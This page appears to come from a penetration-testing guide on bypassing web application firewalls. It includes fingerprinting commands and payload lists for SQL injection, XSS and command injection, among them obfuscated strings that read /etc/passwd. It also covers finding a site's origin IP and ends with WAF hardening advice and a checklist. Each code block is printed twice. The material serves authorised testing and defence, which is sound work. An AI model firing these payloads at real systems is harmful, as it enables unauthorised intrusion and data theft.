Exploitation A05| Security Misconfiguration
WAF Bypass Techniques
Web Application Firewalls (WAFs) are a common defense layer, but they can be bypassed. Understanding bypass techniques helps assess whether the WAF actually provides effective protection.
Scope Reminder
WAF bypass testing should be explicitly included in the engagement scope. Some clients want to test
their WAF's effectiveness; others want you to test the application with the WAF disabled. Clarify this
during pre-engagement.
WAF Detection & Fingerprinting
bash
# wafw00f - WAF fingerprinting tool
pip install wafw00f
wafw00f https://target.com
# Nmap WAF detection scripts
nmap --script=http-waf-detect,http-waf-fingerprint target.com
# Manual indicators:
# - Custom error pages on blocked requests
# - Specific response headers (X-Sucuri-ID, X-CDN, cf-ray)
# - Connection dropped on suspicious payloads
# - JavaScript challenges or CAPTCHAs
# - HTTP 403/406/429 on injection attempts
# Test with a simple payload:
curl -v "https://target.com/search?q=<script>alert(1)</script>"
# If blocked → WAF likely present# wafw00f - WAF fingerprinting tool
pip install wafw00f
wafw00f https://target.com
# Nmap WAF detection scripts
nmap --script=http-waf-detect,http-waf-fingerprint target.com
# Manual indicators:
# - Custom error pages on blocked requests
# - Specific response headers (X-Sucuri-ID, X-CDN, cf-ray)
# - Connection dropped on suspicious payloads
# - JavaScript challenges or CAPTCHAs
# - HTTP 403/406/429 on injection attempts
# Test with a simple payload:
curl -v "https://target.com/search?q=<script>alert(1)</script>"
# If blocked → WAF likely present| WAF | Detection Header/Indicator | Bypass Difficulty |
|---|---|---|
| Cloudflare | cf-ray, server: cloudflare | Medium-Hard |
| AWS WAF | x-amzn-requestid, 403 body patterns | Medium |
| Akamai | AkamaiGHost, reference ID in error | Hard |
| ModSecurity | Apache/Nginx default 403, paranoia levels | Medium (depends on ruleset) |
| Sucuri | X-Sucuri-ID, custom block page | Medium |
| Imperva/Incapsula | X-CDN, incap_ses_ cookies | Hard |
SQL Injection WAF Bypass
bash
# Encoding bypasses
# URL encoding
1%27%20OR%20%271%27%3D%271
# Double URL encoding
1%2527%2520OR%2520%25271%2527%253D%25271
# Unicode/UTF-8 encoding
1%C0%A7%20OR%20%C0%A71%C0%A7%3D%C0%A71
# Comment-based bypasses
1'/**/OR/**/1=1--
1'/*!50000OR*/1=1-- # MySQL version-specific comments
1'||/**/1=1--
# Case manipulation
1' oR 1=1--
1' Or 1=1--
# Whitespace alternatives
1'%09OR%091=1-- # Tab
1'%0AOR%0A1=1-- # Newline
1'%0COR%0C1=1-- # Form feed
1'%A0OR%A01=1-- # Non-breaking space
# Keyword alternatives
1' || 1=1-- # OR → ||
1' && 1=1-- # AND → &&
1' DIV 1-- # Alternative operators
# SQLMap tamper scripts
sqlmap -u "https://target.com/?id=1" --tamper=between,randomcase,space2comment
sqlmap -u "https://target.com/?id=1" --tamper=charencode,chardoubleencode
sqlmap -u "https://target.com/?id=1" --tamper=equaltolike,greatest
# Common tamper scripts:
# space2comment - Replace spaces with /**/
# between - Replace > with BETWEEN
# randomcase - Random capitalization
# charencode - URL-encode characters
# equaltolike - Replace = with LIKE# Encoding bypasses
# URL encoding
1%27%20OR%20%271%27%3D%271
# Double URL encoding
1%2527%2520OR%2520%25271%2527%253D%25271
# Unicode/UTF-8 encoding
1%C0%A7%20OR%20%C0%A71%C0%A7%3D%C0%A71
# Comment-based bypasses
1'/**/OR/**/1=1--
1'/*!50000OR*/1=1-- # MySQL version-specific comments
1'||/**/1=1--
# Case manipulation
1' oR 1=1--
1' Or 1=1--
# Whitespace alternatives
1'%09OR%091=1-- # Tab
1'%0AOR%0A1=1-- # Newline
1'%0COR%0C1=1-- # Form feed
1'%A0OR%A01=1-- # Non-breaking space
# Keyword alternatives
1' || 1=1-- # OR → ||
1' && 1=1-- # AND → &&
1' DIV 1-- # Alternative operators
# SQLMap tamper scripts
sqlmap -u "https://target.com/?id=1" --tamper=between,randomcase,space2comment
sqlmap -u "https://target.com/?id=1" --tamper=charencode,chardoubleencode
sqlmap -u "https://target.com/?id=1" --tamper=equaltolike,greatest
# Common tamper scripts:
# space2comment - Replace spaces with /**/
# between - Replace > with BETWEEN
# randomcase - Random capitalization
# charencode - URL-encode characters
# equaltolike - Replace = with LIKEXSS WAF Bypass
html
# Event handler alternatives (when <script> is blocked)
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
<input onfocus=alert(1) autofocus>
<marquee onstart=alert(1)>
<details open ontoggle=alert(1)>
<video><source onerror=alert(1)>
# Case and encoding tricks
<ScRiPt>alert(1)</ScRiPt>
<script>alert\u00281)</script>
<script>al\u0065rt(1)</script>
<img src=x onerror="alert(1)">
# Tag and attribute obfuscation
<scr<script>ipt>alert(1)</scr</script>ipt>
<img/src=x/onerror=alert(1)>
<img src=x onerror = alert(1) >
# JavaScript protocol bypasses
<a href="javascript:alert(1)">click</a>
<a href="javascript:alert(1)">click</a>
<a href="javascript:alert(1)">click</a>
# Template literal / backtick payloads
<script>alert`1`</script>
<img src=x onerror=alert`1`>
# Bypassing keyword filters
<script>window['al'+'ert'](1)</script>
<script>self[atob('YWxlcnQ=')](1)</script>
<script>top[/al/.source+/ert/.source](1)</script># Event handler alternatives (when <script> is blocked)
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
<input onfocus=alert(1) autofocus>
<marquee onstart=alert(1)>
<details open ontoggle=alert(1)>
<video><source onerror=alert(1)>
# Case and encoding tricks
<ScRiPt>alert(1)</ScRiPt>
<script>alert\u00281)</script>
<script>al\u0065rt(1)</script>
<img src=x onerror="alert(1)">
# Tag and attribute obfuscation
<scr<script>ipt>alert(1)</scr</script>ipt>
<img/src=x/onerror=alert(1)>
<img src=x onerror = alert(1) >
# JavaScript protocol bypasses
<a href="javascript:alert(1)">click</a>
<a href="javascript:alert(1)">click</a>
<a href="javascript:alert(1)">click</a>
# Template literal / backtick payloads
<script>alert`1`</script>
<img src=x onerror=alert`1`>
# Bypassing keyword filters
<script>window['al'+'ert'](1)</script>
<script>self[atob('YWxlcnQ=')](1)</script>
<script>top[/al/.source+/ert/.source](1)</script>Command Injection WAF Bypass
bash
# Space bypass alternatives
cat</etc/passwd
cat$IFS/etc/passwd
cat${IFS}/etc/passwd
{cat,/etc/passwd}
cat%09/etc/passwd
# Keyword bypass
c'a't /etc/passwd
c"a"t /etc/passwd
c\at /etc/passwd
/???/??t /???/p??s?? # Glob patterns
$(printf '\x63\x61\x74') /etc/passwd # Hex encoding
# Variable-based bypass
a]cat;b]=/etc/passwd;$a $b
$(echo Y2F0IC9ldGMvcGFzc3dk | base64 -d) # Base64
# Newline/separator bypass
;cat /etc/passwd
|cat /etc/passwd
`cat /etc/passwd`
$(cat /etc/passwd)
%0acat /etc/passwd # Newline
%0dcat /etc/passwd # Carriage return# Space bypass alternatives
cat</etc/passwd
cat$IFS/etc/passwd
cat${IFS}/etc/passwd
{cat,/etc/passwd}
cat%09/etc/passwd
# Keyword bypass
c'a't /etc/passwd
c"a"t /etc/passwd
c\at /etc/passwd
/???/??t /???/p??s?? # Glob patterns
$(printf '\x63\x61\x74') /etc/passwd # Hex encoding
# Variable-based bypass
a]cat;b]=/etc/passwd;$a $b
$(echo Y2F0IC9ldGMvcGFzc3dk | base64 -d) # Base64
# Newline/separator bypass
;cat /etc/passwd
|cat /etc/passwd
`cat /etc/passwd`
$(cat /etc/passwd)
%0acat /etc/passwd # Newline
%0dcat /etc/passwd # Carriage returnGeneral WAF Bypass Techniques
HTTP Method Switching
- • Change GET to POST or vice versa
- • Use PUT, PATCH, or DELETE methods
- • Try method override headers (
X-HTTP-Method-Override)
Content-Type Manipulation
- • Switch between
application/jsonand form data - • Use
multipart/form-datawith payloads in file fields - • Try
text/xmlorapplication/xml
Request Splitting & Chunking
- • Split payload across multiple parameters
- • Use chunked Transfer-Encoding
- • Abuse parameter pollution (HPP)
Origin-Based Bypass
- • Find the origin IP behind the WAF/CDN
- • Check DNS history, email headers, SSL certs
- • Access the server directly, bypassing the WAF entirely
bash
# Finding origin IP behind CDN/WAF
# DNS history
dig +short target.com @8.8.8.8
# Check historical DNS records at: securitytrails.com, viewdns.info
# Certificate search (may reveal origin IP)
echo | openssl s_client -connect target.com:443 2>/dev/null | openssl x509 -noout -text | grep -A1 "Subject Alternative"
# Shodan/Censys search for SSL cert hash
shodan search ssl.cert.subject.CN:target.com
# Send requests directly to origin IP with Host header
curl -H "Host: target.com" https://ORIGIN_IP/vulnerable?id=1' OR 1=1--# Finding origin IP behind CDN/WAF
# DNS history
dig +short target.com @8.8.8.8
# Check historical DNS records at: securitytrails.com, viewdns.info
# Certificate search (may reveal origin IP)
echo | openssl s_client -connect target.com:443 2>/dev/null | openssl x509 -noout -text | grep -A1 "Subject Alternative"
# Shodan/Censys search for SSL cert hash
shodan search ssl.cert.subject.CN:target.com
# Send requests directly to origin IP with Host header
curl -H "Host: target.com" https://ORIGIN_IP/vulnerable?id=1' OR 1=1--🛡️ Defense & WAF Hardening
WAF Best Practices
Configuration
- • WAFs are defense-in-depth, not a replacement for secure code
- • Use positive security models (allowlist) over negative (blocklist)
- • Normalize/decode input before rule evaluation
- • Enable recursive decoding (multi-pass normalization)
Architecture
- • Restrict origin server to only accept traffic from WAF IPs
- • Don't expose origin IP in DNS, emails, or error messages
- • Keep WAF rules and signatures up to date
- • Test WAF bypass regularly as part of security assessments
CWE References: CWE-693 (Protection Mechanism Failure)
✅ WAF Bypass Checklist
Detection
- ☐ WAF identified & fingerprinted
- ☐ Block patterns documented
- ☐ Origin IP search performed
- ☐ Rate limiting behavior noted
Encoding Bypasses
- ☐ URL encoding (single/double)
- ☐ Unicode / UTF-8 encoding
- ☐ HTML entity encoding
- ☐ Base64 / hex encoding
Request Manipulation
- ☐ HTTP method switching
- ☐ Content-Type manipulation
- ☐ Parameter pollution
- ☐ Chunked encoding bypass